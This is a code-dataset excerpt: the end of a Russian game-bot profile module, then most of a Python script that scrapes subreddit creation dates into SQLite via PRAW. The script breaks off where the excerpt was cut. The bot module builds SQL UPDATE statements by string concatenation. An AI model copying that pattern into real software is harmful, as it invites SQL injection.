guns[(info[0][7])-1][0]\r\nelse:\r\n\tgun = '(Пусто)'\r\n\r\nif info[0][8] > 0:\r\n\tarmorr = armor[(info[0][8])-1][0]\r\nelse:\r\n\tarmorr = '(Пусто)'\r\n\r\nrank = list(ranks).index(info[0][3])\r\nrep = int(info[0][4])\r\n\r\nif rep >= ranks[list(ranks)[rank+1]][0]:\r\n\tcursor.execute(\"UPDATE users SET Status = '\"+str(list(ranks)[rank+1])+\"' WHERE ID = \"+str(from_id)+\"\")\r\n\r\nelif rep < ranks[list(ranks)[rank]][1] and rank != 0:\r\n\tcursor.execute(\"UPDATE users SET Status = '\"+str(list(ranks)[rank-1])+\"' WHERE ID = \"+str(from_id)+\"\")\r\n\r\nconn.commit()\r\n\r\ncursor.execute(\"SELECT * FROM users WHERE ID = ?\", 
([str(from_id)]))\r\ninfo = cursor.fetchall()\r\nsend(user, '📖 Ваш паспорт:\\n\\n📄 Имя: '+info[0][1]+'.\\n\\n🎖 Звание: '+info[0][3]+'.\\n\\n🏆 Репутация: '+info[0][4]+'.\\n\\n⚔ Оружие: '+gun+', Броня: '+armorr+'.\\n\\n💰 Счет: '+str(info[0][2])+' патрон.')","sub_path":"modules/default/passport.py","file_name":"passport.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"126838526","text":"#/u/GoldenSights\nimport praw # simple interface to the reddit API, also handles rate limiting of requests\nimport bot\nimport time\nimport sqlite3\nimport datetime\nimport urllib\nimport json\nimport sys\nimport random\nimport os\nimport tkinter\nimport subprocess\n\n'''USER CONFIGURATION'''\n\nUSERAGENT = \"/u/GoldenSights SubredditBirthdays data collection: Gathering the creation dates of subreddits in the interest of information.\\\n More at https://github.com/voussoir/reddit/tree/master/SubredditBirthdays\"\n#This is a short description of what the bot does. For example \"/u/GoldenSights' Newsletter bot\"\n\nWAIT = 20\n#This is how many seconds you will wait between cycles. The bot is completely inactive during this time.\n\n'''All done!'''\n\nWAITS = str(WAIT)\n\n\nsql = sqlite3.connect('sql.db')\ncur = sql.cursor()\ncur2 = sql.cursor()\ncur.execute('CREATE TABLE IF NOT EXISTS subreddits(idint INT, idstr TEXT, created INT, human TEXT, name TEXT, nsfw INT, subscribers INT, jumble INT, subreddit_type INT, submission_type INT)')\ncur.execute('CREATE INDEX IF NOT EXISTS subindex ON subreddits(idint)')\nprint('Loaded SQL Database')\nsql.commit()\n# 0 - idint\n# 1 - idstr\n# 2 - created\n# 3 - human\n# 4 - name\n# 5 - nsfw\n# 6 - subscribers\n# 7 - jumble\n# 8 - subreddit type\n# 9 - submission type\nSQL_COLUMNCOUNT = 10\nSQL_IDINT = 0\nSQL_IDSTR = 1\nSQL_CREATED = 2\nSQL_HUMAN = 3\nSQL_NAME = 4\nSQL_NSFW = 5\nSQL_SUBSCRIBERS = 6\nSQL_JUMBLE = 7\nSQL_SUBREDDIT_TYPE = 8\nSQL_SUBMISSION_TYPE = 9\n\nprint('Logging in.')\nr = praw.Reddit(USERAGENT)\nr.login(bot.uG, bot.pG)\n\nolds = 0\nnoinfolist = []\nerrormess = None\nmonthnumbers = {\n\t\"Jan\":\"01\",\n\t\"Feb\":\"02\",\n\t\"Mar\":\"03\",\n\t\"Apr\":\"04\",\n\t\"May\":\"05\",\n\t\"Jun\":\"06\",\n\t\"Jul\":\"07\",\n\t\"Aug\":\"08\",\n\t\"Sep\":\"09\",\n\t\"Oct\":\"10\",\n\t\"Nov\":\"11\",\n\t\"Dec\":\"12\"\n}\n\nSUBREDDIT_TYPE = {\n\t'public':0,\n\t'restricted':1,\n\t'private':2,\n\t'archived':3,\n\tNone:4,\n\t'employees_only':5,\n\t'gold_restricted':6,\n\t'gold_only':6\n}\nSUBMISSION_TYPE = {\n\t'any':0,\n\t'link':1,\n\t'self':2,\n\tNone:3\n}\n\n\nLOWERBOUND_STR = '2qh0j'\nLOWERBOUND_INT = 4594339\n\nMEMBERFORMAT = '{idstr}, {human}, {nsfw}, {name}{spacer}{subscribers}'\n\n\ndef human(timestamp):\n\tday = datetime.datetime.utcfromtimestamp(timestamp)\n\thuman = datetime.datetime.strftime(day, \"%b %d %Y %H:%M:%S UTC\")\n\treturn human\n\ndef processi(sr, doupdates=True, enablekilling=False):\n\tglobal olds\n\tif 't5_' not in sr:\n\t\tsr = 't5_' + sr\n\tcur.execute('SELECT * FROM subreddits WHERE idint=?', [b36(sr[3:])])\n\tif not cur.fetchone() or doupdates==True:\n\t\tsro = r.get_info(thing_id=sr)\n\t\ttry:\n\t\t\tsro.id\n\t\t\tprocess(sro)\n\t\texcept AttributeError:\n\t\t\tprint('Could not fetch subreddit')\n\t\t\tif enablekilling:\n\t\t\t\ti = input('Kill?\\n> ')\n\t\t\t\tif i.lower() == 'y':\n\t\t\t\t\tkill(sr[3:])\n\telse:\n\t\tolds += 1\n\ndef process(sr, database=\"subreddits\", delaysaving=False, doupdates=True, isjumbled=False, 
nosave=False):\n\tglobal olds\n\tsubs = []\n\n\tif type(sr) == str:\n\t\tfor splitted in sr.split(','):\n\t\t\tsplitted = splitted.replace(' ', '')\n\t\t\tif doupdates==False:\n\t\t\t\tcur.execute('SELECT * FROM subreddits WHERE LOWER(name)=?', [splitted.lower()])\n\t\t\t\tif not cur.fetchone():\n\t\t\t\t\tsr = r.get_subreddit(splitted)\n\t\t\t\t\tsubs.append(sr)\n\t\t\t\telse:\n\t\t\t\t\tolds += 1\n\t\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tsr = r.get_subreddit(splitted)\n\t\t\t\tsubs.append(sr)\n\n\telif type(sr) == praw.objects.Submission or type(sr) == praw.objects.Comment:\n\t\tsr = sr.subreddit\n\t\tsubs.append(sr)\n\n\telse:\n\t\tsubs.append(sr)\n\n\tfor sub in subs:\n\t\ttry:\n\t\t\tidint = b36(sub.id)\n\t\t\tcur.execute('SELECT * FROM subreddits WHERE idint=?', [idint])\n\t\t\tf = cur.fetchone()\n\t\t\tif not f:\n\t\t\t\th = human(sub.created_utc)\n\t\t\t\tisnsfw = 1 if sub.over18 else 0\n\t\t\t\tsubscribers = sub.subscribers if sub.subscribers else 0\n\t\t\t\tisjumbled = 1 if isjumbled else 0\n\t\t\t\tprint('New: %s : %s : %s : %s : %d' % (sub.id, h, isnsfw, sub.display_name, subscribers))\n\t\t\t\tsubreddit_type = SUBREDDIT_TYPE[sub.subreddit_type]\n\t\t\t\tsubmission_type = SUBMISSION_TYPE[sub.submission_type]\n\t\t\t\tdata = ['.'] * SQL_COLUMNCOUNT\n\t\t\t\tdata[SQL_IDINT] = idint\n\t\t\t\tdata[SQL_IDSTR] = sub.id\n\t\t\t\tdata[SQL_CREATED] = sub.created_utc\n\t\t\t\tdata[SQL_HUMAN] = h\n\t\t\t\tdata[SQL_NSFW] = isnsfw\n\t\t\t\tdata[SQL_NAME] = sub.display_name\n\t\t\t\tdata[SQL_SUBSCRIBERS] = subscribers\n\t\t\t\tdata[SQL_JUMBLE] = isjumbled\n\t\t\t\tdata[SQL_SUBREDDIT_TYPE] = subreddit_type\n\t\t\t\tdata[SQL_SUBMISSION_TYPE] = submission_type\n\t\t\t\tcur.execute('INSERT INTO subreddits VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', data)\n\t\t\telif doupdates:\n\t\t\t\tif sub.subscribers != None:\n\t\t\t\t\tsubscribers = sub.subscribers\n\t\t\t\telse:\n\t\t\t\t\tsubscribers = 0\n\t\t\t\th = human(sub.created_utc)\n\t\t\t\tisnsfw = 1 if sub.over18 else 0\n\t\t\t\tif isjumbled is True or int(f[SQL_JUMBLE]) == 1:\n\t\t\t\t\tisjumbled = 1\n\t\t\t\telse:\n\t\t\t\t\tisjumbled = 0\n\t\t\t\tsubreddit_type = SUBREDDIT_TYPE[sub.subreddit_type]\n\t\t\t\tsubmission_type = SUBMISSION_TYPE[sub.submission_type]\n\t\t\t\toldsubs = f[SQL_SUBSCRIBERS]\n\t\t\t\tsubscriberdiff = subscribers - oldsubs\n\t\t\t\tprint('Upd: %s : %s : %s : %s : %d (%d)' % (sub.id, h, isnsfw, sub.display_name, subscribers, subscriberdiff))\n\t\t\t\tcur.execute('UPDATE subreddits SET subscribers=?, jumble=?, subreddit_type=?, submission_type=? 
WHERE idint=?',\n\t\t\t\t\t[subscribers, isjumbled, subreddit_type, submission_type, idint])\n\t\t\t\tolds += 1\n\t\t\telse:\n\t\t\t\tolds += 1\n\t\t\tif not delaysaving and not nosave:\n\t\t\t\tsql.commit()\n\t\texcept praw.requests.exceptions.HTTPError:\n\t\t\tprint('HTTPError:', sub)\n\tif not nosave:\t\t\t\n\t\tsql.commit()\n\n\ndef chunklist(inputlist, chunksize):\n\tif len(inputlist) < chunksize:\n\t\treturn [inputlist]\n\telse:\n\t\toutputlist = []\n\t\twhile len(inputlist) > 0:\n\t\t\toutputlist.append(inputlist[:chunksize])\n\t\t\tinputlist = inputlist[chunksize:]\n\t\treturn outputlist\n\ndef processmega(srinput, isrealname=False, chunksize=100, docrash=False, delaysaving=False, doupdates=True, nosave=False):\n\tglobal olds\n\tglobal noinfolist\n\t#This is the new standard in sr processing\n\t#Other methods will be deprecated\n\t#Heil\n\tif type(srinput) == str:\n\t\tsrinput = srinput.replace(' ', '')\n\t\tsrinput = srinput.split(',')\n\n\tif isrealname == False:\n\t\tremaining = len(srinput)\n\t\tfor x in range(len(srinput)):\n\t\t\tif 't5_' not in srinput[x]:\n\t\t\t\tsrinput[x] = 't5_' + srinput[x]\n\t\tsrinput = chunklist(srinput, chunksize)\n\t\tfor subset in srinput:\n\t\t\ttry:\n\t\t\t\tprint(subset[0] + ' - ' + subset[-1], remaining)\n\t\t\t\tsubreddits = r.get_info(thing_id=subset)\n\t\t\t\ttry:\n\t\t\t\t\tfor sub in subreddits:\n\t\t\t\t\t\tprocess(sub, delaysaving=delaysaving, doupdates=doupdates, nosave=nosave)\n\t\t\t\texcept TypeError:\n\t\t\t\t\tnoinfolist = subset[:]\n\t\t\t\t\tif len(noinfolist) == 1:\n\t\t\t\t\t\tprint('Received no info. See variable `noinfolist`')\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor item in noinfolist:\n\t\t\t\t\t\t\tprocessmega([item])\n\n\t\t\t\tremaining -= len(subset)\n\t\t\texcept praw.requests.exceptions.HTTPError as e:\n\t\t\t\tprint(e)\n\t\t\t\tprint(vars(e))\n\t\t\t\tif docrash:\n\t\t\t\t\traise Exception(\"I've been commanded to crash\")\n\telse:\n\t\tfor subname in srinput:\n\t\t\tprocess(subname)\n\n\ndef processrand(count, doublecheck=False, sleepy=0, delaysaving=False, doupdates=True):\n\t\"\"\"\n\tGets random IDs between a known lower bound and the newest collection\n\t*int count= How many you want\n\tbool doublecheck= Should it reroll duplicates before running\n\tint sleepy= Used to sleep longer than the reqd 2 seconds\n\t\"\"\"\n\tglobal olds\n\tolds = 0\n\tlower = LOWERBOUND_INT\n\n\tcur.execute('SELECT * FROM subreddits ORDER BY idint DESC LIMIT 1')\n\tupper = cur.fetchone()[SQL_IDSTR]\n\tprint('<' + b36(lower).lower() + ',', upper + '>', end=', ')\n\tupper = b36(upper)\n\ttotalpossible = upper-lower\n\tprint(totalpossible, 'possible')\n\trands = []\n\tif doublecheck:\n\t\tallids = [x[SQL_IDSTR] for x in fetched]\n\tfor x in range(count):\n\t\trand = random.randint(lower, upper)\n\t\trand = b36(rand).lower()\n\t\tif doublecheck:\n\t\t\twhile rand in allids or rand in rands:\n\t\t\t\tif rand in allids:\n\t\t\t\t\tprint('Old:', rand, 'Rerolling: in allid')\n\t\t\t\telse:\n\t\t\t\t\tprint('Old:', rand, 'Rerolling: in rands')\n\t\t\t\trand = random.randint(lower, upper)\n\t\t\t\trand = b36(rand).lower()\n\t\t\t\tolds += 1\n\t\trands.append(rand)\n\n\trands.sort()\n\tprocessmega(rands, delaysaving=delaysaving, doupdates=doupdates)\n\n\tprint('Rejected', olds)\n\ndef kill(sr):\n\tdata = ['.'] * SQL_COLUMNCOUNT\n\tdata[SQL_IDINT] = b36(sr)\n\tdata[SQL_IDSTR] = sr\n\tdata[SQL_CREATED] = 0\n\tdata[SQL_HUMAN] = None\n\tdata[SQL_NSFW] = None\n\tdata[SQL_NAME] = None\n\tdata[SQL_SUBSCRIBERS] = None\n\tdata[SQL_JUMBLE] = 
0\n\tdata[SQL_SUBREDDIT_TYPE] = None\n\tdata[SQL_SUBMISSION_TYPE] = None\n\tcur.execute('INSERT INTO subreddits VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', data)\n\tsql.commit()\n\ndef fetchgenerator():\n\twhile True:\n\t\tfetch = cur.fetchone()\n\t\tif fetch is None:\n\t\t\tbreak\n\t\tyield fetch\n\ndef datetimedict(outputdict, timestamp, strftime):\n\tdtd = datetime.datetime.strftime(timestamp, strftime) # 01\n\toutputdict[dtd] = outputdict.get(dtd, 0) + 1\n\ndef show():\n\tfile_all_time = open('show\\\\all-time.txt', 'w')\n\tfile_all_name = open('show\\\\all-name.txt', 'w')\n\tfile_all_subscribers = open('show\\\\all-subscribers.txt', 'w')\n\tfile_dirty_time = open('show\\\\dirty-time.txt', 'w')\n\tfile_dirty_name = open('show\\\\dirty-name.txt', 'w')\n\tfile_dirty_subscribers = open('show\\\\dirty-subscribers.txt', 'w')\n\tfile_jumble_sfw = open('show\\\\jumble.txt', 'w')\n\tfile_jumble_nsfw = open('show\\\\jumble-nsfw.txt', 'w')\n\tfile_duplicates = open('show\\\\duplicates.txt', 'w')\n\tfile_missing = open('show\\\\missing.txt', 'w')\n\tfile_stats = open('show\\\\statistics.txt', 'w')\n\tfile_readme = open('README.md', 'r')\n\n\tcur.execute('SELECT COUNT(idint) FROM subreddits WHERE created != 0')\n\titemcount_valid = cur.fetchone()[0]\n\titemcount_nsfw = 0\n\tprint(itemcount_valid, 'subreddits')\n\n\tprint('Writing time files.')\n\tcur.execute('SELECT * FROM subreddits WHERE created !=0 ORDER BY created ASC')\n\tfor item in fetchgenerator():\n\t\titemf = memberformat(item)\n\t\tprint(itemf, file=file_all_time)\n\t\tif int(item[SQL_NSFW]) == 1:\n\t\t\tprint(itemf, file=file_dirty_time)\n\t\t\titemcount_nsfw += 1\n\tfile_all_time.close()\n\tfile_dirty_time.close()\n\n\tprint('Writing name files and duplicates.')\n\tpreviousitem = None\n\tinprogress = False\n\tcur.execute('SELECT * FROM subreddits WHERE created != 0 ORDER BY LOWER(name) ASC')\n\tfor item in fetchgenerator():\n\t\tif previousitem != None and item[SQL_NAME] == previousitem[SQL_NAME]:\n\t\t\tprint(memberformat(previousitem), file=file_duplicates)\n\t\t\tinprogress = True\n\t\telif inprogress:\n\t\t\tprint(memberformat(previousitem), file=file_duplicates)\n\t\t\tinprogress = False\n\t\tpreviousitem = item\n\n\t\titemf = memberformat(item)\n\t\tprint(itemf, file=file_all_name)\n\t\tif int(item[SQL_NSFW]) == 1:\n\t\t\tprint(itemf, file=file_dirty_name)\n\tfile_duplicates.close()\n\tfile_all_name.close()\n\tfile_dirty_name.close()\n\n\tprint('Writing subscriber files.')\n\trank_all = 1\n\trank_nsfw = 1\n\tcur.execute('SELECT * FROM subreddits WHERE created != 0 ORDER BY subscribers DESC')\n\tfor item in fetchgenerator():\n\t\tif rank_all <= 20000:\n\t\t\trankstr = commapadding(rank_all, ' ', 9)\n\t\t\trank_all += 1\n\t\telse:\n\t\t\trankstr = ''\n\t\titemf = memberformat(item)\n\t\tprint(itemf+rankstr, file=file_all_subscribers)\n\t\tif int(item[SQL_NSFW]) == 1:\n\t\t\tif rank_nsfw <= 20000:\n\t\t\t\trankstr = commapadding(rank_nsfw, ' ', 9)\n\t\t\t\trank_nsfw += 1\n\t\t\telse:\n\t\t\t\trankstr = ''\n\t\t\tprint(itemf+rankstr, file=file_dirty_subscribers)\n\tfile_all_subscribers.close()\n\tfile_dirty_subscribers.close()\n\n\tprint('Writing jumble.')\n\tcur.execute('SELECT * FROM subreddits WHERE jumble == 1 ORDER BY subscribers DESC')\n\tfor item in fetchgenerator():\n\t\titemf = memberformat(item)\n\t\tif int(item[SQL_NSFW]) == 0:\n\t\t\tprint(itemf, file=file_jumble_sfw)\n\t\telse:\n\t\t\tprint(itemf, file=file_jumble_nsfw)\n\tfile_jumble_sfw.close()\n\tfile_jumble_nsfw.close()\n\n\tprint('Writing missing.')\n\tcur.execute('SELECT 
* FROM subreddits WHERE created == 0 ORDER BY idint ASC')\n\tfor item in fetchgenerator():\n\t\tprint(item[SQL_IDSTR], file=file_missing)\n\tfile_missing.close()\n\n\n\tprint('Writing statistics.')\n\theadline = 'Collected {0:,} subreddits\\n'.format(itemcount_valid)\n\tstatisticoutput = headline + '\\n\\n'\n\tstatisticoutput += ' SFW: {0:,}\\n'.format(itemcount_valid - itemcount_nsfw)\n\tstatisticoutput += 'NSFW: {0:,}\\n\\n\\n'.format(itemcount_nsfw)\n\n\tcur.execute('SELECT * FROM subreddits WHERE created != 0 ORDER BY created DESC limit 20000')\n\tlast20k = cur.fetchall()\n\ttimediff = last20k[0][SQL_CREATED] - last20k[-1][SQL_CREATED]\n\tstatisticoutput += '%.2f subs are created each hour\\n' % (20000 / (timediff/3600))\n\tstatisticoutput += '%.2f subs are created each day\\n\\n\\n' % (20000 / (timediff/86400))\n\n\n\t################################\n\t# Breakdown by time period\n\t# hour of day, day of week, day of month, month of year, month-year, year\n\thoddict = {}\n\tdowdict = {}\n\tdomdict = {}\n\tmoydict = {}\n\tmyrdict = {}\n\tyerdict = {}\n\tcur.execute('SELECT * FROM subreddits WHERE created != 0')\n\tprint(' performing time breakdown')\n\tfor item in fetchgenerator():\n\t\tdt = datetime.datetime.utcfromtimestamp(item[SQL_CREATED])\n\n\t\tdatetimedict(hoddict, dt, '%H') # 01\n\t\tdatetimedict(dowdict, dt, '%A') # Monday\n\t\tdatetimedict(domdict, dt, '%d') # 01\n\t\tdatetimedict(moydict, dt, '%B') # January\n\t\tdatetimedict(myrdict, dt, '%b%Y') # Jan2015\n\t\tdatetimedict(yerdict, dt, '%Y') # 2015\n\n\tprint(' forming columns')\n\tplotnum = 0\n\tmodes = [None, 'day', None, 'month', None, 'monthyear']\n\tdicts = [hoddict, dowdict, domdict, moydict, yerdict, myrdict]\n\tfor index in range(len(dicts)):\n\t\td = dicts[index]\n\t\tdkeys_primary = list(d.keys())\n\t\tdkeys_primary.sort(key=d.get)\n\t\tdkeys_secondary = specialsort(dkeys_primary, modes[index])\n\t\tdvals = [d[x] for x in dkeys_secondary]\n\n\t\tfor keyindex in range(len(dkeys_primary)):\n\t\t\tkey = dkeys_primary[keyindex]\n\t\t\tval = d[key]\n\t\t\tval = '{0:,}'.format(val)\n\t\t\tspacer = 34 - (len(key) + len(val))\n\t\t\tspacer = '.' * spacer\n\t\t\tstatisticoutput += key + spacer + val\n\t\t\tstatisticoutput += ' ' * 8\n\n\t\t\tkey = dkeys_secondary[keyindex]\n\t\t\tval = d[key]\n\t\t\tval = '{0:,}'.format(val)\n\t\t\tspacer = 34 - (len(key) + len(val))\n\t\t\tspacer = '.' 
* spacer\n\t\t\tstatisticoutput += key + spacer + val\n\t\t\tstatisticoutput += '\\n'\n\t\tstatisticoutput += '\\n'\n\n\t\tplotbars(str(plotnum), [dkeys_secondary, dvals], colormid='#43443a', forcezero=True)\n\t\tplotnum += 1\n\t\tif d is myrdict:\n\t\t\tplotbars(str(plotnum), [dkeys_secondary[-15:], dvals[-15:]], colorbg=\"#272822\", colorfg=\"#000\", colormid=\"#43443a\", forcezero=True)\n\t\t\tplotnum += 1\n\t#\n\t# Breakdown by time period\n\t################################\n\tprint(statisticoutput, file=file_stats)\n\tfile_stats.close()\n\n\tprint('Updating Readme')\n\treadmelines = file_readme.readlines()\n\tfile_readme.close()\n\treadmelines[3] = '#####' + headline\n\treadmelines[5] = '#####[Today\\'s jumble](http://reddit.com/r/%s)\\n' % jumble(doreturn=True)[0]\n\tfile_readme = open('README.md', 'w')\n\tfile_readme.write(''.join(readmelines))\n\tfile_readme.close()\n\n\ttime.sleep(2)\n\tx = subprocess.call('PNGCREATOR.bat', shell=True, cwd='spooky')\n\tprint()\n\ndef memberformat(member, spacerchar='.'):\n\tidstr = commapadding(member[SQL_IDSTR], ' ', 5, forcestring=True)\n\thuman = member[SQL_HUMAN]\n\tnsfw = member[SQL_NSFW]\n\tname = member[SQL_NAME]\n\tsubscribers = '{0:,}'.format(member[SQL_SUBSCRIBERS])\n\tspacer = 35 - (len(name) + len(subscribers))\n\tspacer = spacerchar * spacer\n\tmember = MEMBERFORMAT.format(\n\t\tidstr=idstr,\n\t\thuman=human,\n\t\tnsfw=nsfw,\n\t\tname=name,\n\t\tspacer=spacer,\n\t\tsubscribers=subscribers)\n\treturn member\n\ndef commapadding(s, spacer, spaced, left=True, forcestring=False):\n\t'''\n\tGiven a number 's', make it comma-delimted and then\n\tpad it on the left or right using character 'spacer'\n\tso the whole string is of length 'spaced'\n\n\tProviding a non-numerical string will skip straight\n\tto padding\n\t'''\n\tif not forcestring:\n\t\ttry:\n\t\t\ts = int(s)\n\t\t\ts = '{0:,}'.format(s)\n\t\texcept:\n\t\t\tpass\n\n\tspacer = spacer * (spaced - len(s))\n\tif left:\n\t\treturn spacer + s\n\treturn s + spacer\n\ndef dictadding(targetdict, item):\n\tif item not in targetdict:\n\t\ttargetdict[item] = 1\n\telse:\n\t\ttargetdict[item] = targetdict[item] + 1\n\treturn targetdict\n\ndef specialsort(inlist, mode=None):\n\tif mode == 'month':\n\t\treturn ['January', 'February', 'March', \\\n\t\t\t\t'April', 'May', 'June', 'July', \\\n\t\t\t\t'August', 'September', 'October', \\\n\t\t\t\t'November', 'December']\n\tif mode == 'day':\n\t\treturn ['Sunday', 'Monday', 'Tuesday', \\\n\t\t\t\t'Wednesday', 'Thursday', 'Friday', \\\n\t\t\t\t'Saturday']\n\tif mode == 'monthyear':\n\t\ttd = {}\n\t\tfor item in inlist:\n\t\t\tnitem = item\n\t\t\tnitem = item.replace(item[:3], monthnumbers[item[:3]])\n\t\t\tnitem = nitem[3:] + nitem[:3]\n\t\t\ttd[item] = nitem\n\t\ttdkeys = list(td.keys())\n\t\t#print(td)\n\t\ttdkeys.sort(key=td.get)\n\t\t#print(tdkeys)\n\t\treturn tdkeys\n\tif mode is None:\n\t\treturn sorted(inlist)\n\n\ndef shown(startinglist, header, fileobj, nsfwmode=2):\n\t\"\"\"\n\tCreating Show files with filters\n\t*lst startinglist= the unfiltered list\n\t*str header= the header at the top of the file\n\t*obj fileobj= the file object to write to\n\t*int nsfwmode=\n\t 0 - Clean only\n\t 1 - Dirty only\n\t 2 - All\n\t\"\"\"\n\n\tnsfwyes = []\n\tnsfwno = []\n\tnsfwq = []\n\tfor item in startinglist:\n\t\tif item[3] == '1':\n\t\t\tnsfwyes.append(item)\n\t\telif item[3] == '?':\n\t\t\tnsfwq.append(item)\n\t\telse:\n\t\t\tnsfwno.append(item)\n\tprint(header, file=fileobj)\n\tif nsfwmode == 0 or nsfwmode == 2:\n\t\tfor member in 
nsfwno:\n\t\t\tprint(memberformat(member), file=fileobj)\n\t\tprint('\\n' + ('#'*64 + '\\n')*5, file=fileobj)\n\n\tif nsfwmode == 1 or nsfwmode == 2:\n\t\tfor member in nsfwyes:\n\t\t\tprint(memberformat(member), file=fileobj)\n\t\tprint('\\n' + ('#'*64 + '\\n')*5, file=fileobj)\n\n\tif nsfwmode == 2:\n\t\tfor member in nsfwq:\n\t\t\tprint(memberformat(member), file=fileobj)\n\n\ndef base36encode(number, alphabet='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'):\n \"\"\"Converts an integer to a base36 string.\"\"\"\n if not isinstance(number, (int)):\n raise TypeError('number must be an integer')\n base36 = ''\n sign = ''\n if number < 0:\n sign = '-'\n number = -number\n if 0 <= number < len(alphabet):\n return sign + alphabet[number]\n while number != 0:\n number, i = divmod(number, len(alphabet))\n base36 = alphabet[i] + base36\n return sign + base36\n\ndef base36decode(number):\n return int(number, 36)\n\ndef b36(i):\n\tif type(i) == int:\n\t\treturn base36encode(i)\n\tif type(i) == str:\n\t\treturn base36decode(i)\n\ndef search(query=\"\", casesense=False, filterout=[], subscribers=0, nsfwmode=2, idd=\"\", doreturn=False):\n\t\"\"\"\n\tSearch for a subreddit by name\n\t*str query= The search query\n\t \"query\" = results where \"query\" is in the name\n\t \"*query\" = results where \"query\" is at the end of the name\n\t \"query*\" = results where \"query\" is at the beginning of the name\n\t \"*querry*\" = results where \"query\" is in the middle of the name\n\tbool casesense = is the search case sensitive\n\tlist filterout = [list, of, words] to omit from search. Follows casesense\n\tint subscribers = minimum number of subscribers\n\tint nsfwmode=\n\t 0 - Clean only\n\t 1 - Dirty only\n\t 2 - All\n\t\"\"\"\n\n\tif idd == \"\":\n\t\tcur.execute('SELECT * FROM subreddits WHERE name !=?', ['?'])\n\t\tfetched = cur.fetchall()\n\t\tfetched.sort(key=lambda x: x[SQL_NAME].lower())\n\n\t\tresults = []\n\t\tif not casesense:\n\t\t\tquery = query.lower()\n\t\t\tfor x in range(len(filterout)):\n\t\t\t\tfilterout[x] = filterout[x].lower()\n\n\t\t#print(len(fetched))\n\t\tfor subreddit in fetched:\n\t\t\titem = subreddit[SQL_NAME]\n\t\t\tif nsfwmode==2 or (subreddit[SQL_NSFW] == \"1\" and nsfwmode == 1) or (subreddit[SQL_NSFW] == \"0\" and nsfwmode == 0):\n\t\t\t\tif not casesense:\n\t\t\t\t\titem = item.lower()\n\t\t\t\tquerl = query.replace('*', '')\n\t\t\t\tif querl in item:\n\t\t\t\t\t#print(item)\n\t\t\t\t\tif all(filters not in item for filters in filterout):\n\t\t\t\t\t\titemsplit = item.split(querl)\n\t\t\t\t\t\tif ':' in query:\n\t\t\t\t\t\t\tif (query[-1] == '*' and query[0] != '*') and itemsplit[0] == '':\n\t\t\t\t\t\t\t\tresults.append(subreddit)\n\t\t\t\t\n\t\t\t\t\t\t\tif (query[0] == '*' and query[-1] != '*') and itemsplit[-1] == '':\n\t\t\t\t\t\t\t\tresults.append(subreddit)\n\t\t\t\t\n\t\t\t\t\t\t\tif (query[-1] == '*' and query[0] == '*') and (itemsplit[0] != '' and itemsplit[-1] != ''):\n\t\t\t\t\t\t\t\tresults.append(subreddit)\n\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tresults.append(subreddit)\n\t\t\t\t\telse:\n\t\t\t\t\t\t#print('Filtered', item)\n\t\t\t\t\t\tpass\n\n\t\tif not doreturn:\n\t\t\tfor item in results:\n\t\t\t\titem = str(item)\n\t\t\t\titem = item.replace(\"'\", '')\n\t\t\t\tprint(item)\n\t\t\tprint()\n\t\telse:\n\t\t\treturn results\n\n\telse:\n\t\tcur.execute('SELECT * FROM subreddits WHERE idint=?', [b36(idd)])\n\t\tf = cur.fetchone()\n\t\tprint(f)\n\ndef cls():\n\tos.system('cls')\n\ndef findwrong():\n\tcur.execute('SELECT * FROM subreddits WHERE NAME!=?', 
['?'])\n\tfetch = cur.fetchall()\n\tfetch.sort(key=lambda x: x[SQL_IDINT])\n\t#sorted by ID\n\tfetch = fetch[25:]\n\t\n\tpos = 0\n\tl = []\n\n\twhile pos < len(fetch)-5:\n\t\tif fetch[pos][1] > fetch[pos+1][1]:\n\t\t\tl.append(str(fetch[pos-1]))\n\t\t\tl.append(str(fetch[pos]))\n\t\t\tl.append(str(fetch[pos+1]) + \"\\n\")\n\t\tpos += 1\n\n\tfor x in l:\n\t\tprint(x)\n\ndef processjumble(count, nsfw=False):\n\tfor x in range(count):\n\t\tsub = r.get_random_subreddit(nsfw=nsfw)\n\t\tprocess(sub, isjumbled=True, doupdates=True)\n\t\t#else:\n\t\t#\tprint('Upd: ' + sub.id + ' '+ sub.display_name + ' : ' + str(sub.subscribers))\n\t\t#cur.execute('UPDATE subreddits SET JUMBLE=? WHERE ID=?', [sub.subscribers, '1', sub.id])\n\t\tsql.commit()\n\n\ndef jumble(count=20, doreturn=False, nsfw=False):\n\tnsfw = 1 if nsfw else 0\n\tcur.execute('SELECT * FROM subreddits WHERE jumble=1 AND nsfw=? ORDER BY RANDOM() LIMIT ?', [nsfw, count])\n\tfetch = cur.fetchall()\n\trandom.shuffle(fetch)\n\tfetch = fetch[:count]\n\tfetch = [f[:-1] for f in fetch]\n\tfetchstr = [i[SQL_NAME] for i in fetch]\n\tfetchstr = '+'.join(fetchstr)\n\toutput = [fetchstr, fetch]\n\tif doreturn:\n\t\treturn output\n\tprint(output[0])\n\tfor x in output[1]:\n\t\tprint(str(x).replace(\"'\", ''))\n\ndef modsfromid(subid):\n\tif 't5_' not in subid:\n\t\tsubid = 't5_' + subid\n\tsub = r.get_info(thing_id=subid)\n\tmods = list(sub.get_moderators())\n\tfor m in mods:\n\t\tprint(m)\n\treturn mods\n\ndef modernize():\n\t#cur.execute('SELECT * FROM subreddits')\n\t#f=cur.fetchall()\n\t#f.sort(key=lambda x: x[SQL_CREATED])\n\t#finalitem = f[-1]\n\tcur.execute('SELECT * FROM subreddits ORDER BY created DESC LIMIT 1')\n\tfinalitem = cur.fetchone()\n\tprint('Current final item:')\n\tprint(finalitem[SQL_IDSTR], finalitem[SQL_HUMAN], finalitem[SQL_NAME])\n\tfinalid = finalitem[SQL_IDINT]\n\n\tprint('Newest item:')\n\tnewestid = get_newest_sub()\n\tprint(newestid)\n\tnewestid = b36(newestid)\n\t\n\n\tmodernlist = []\n\tfor x in range(finalid, newestid):\n\t\tmodernlist.append(b36(x).lower())\n\tprocessmega(modernlist)\n\ndef rounded(x, rounding=100):\n\treturn int(round(x/rounding)) * rounding\n\ndef plotbars(title, inputdata, colorbg=\"#fff\", colorfg=\"#000\", colormid=\"#888\", 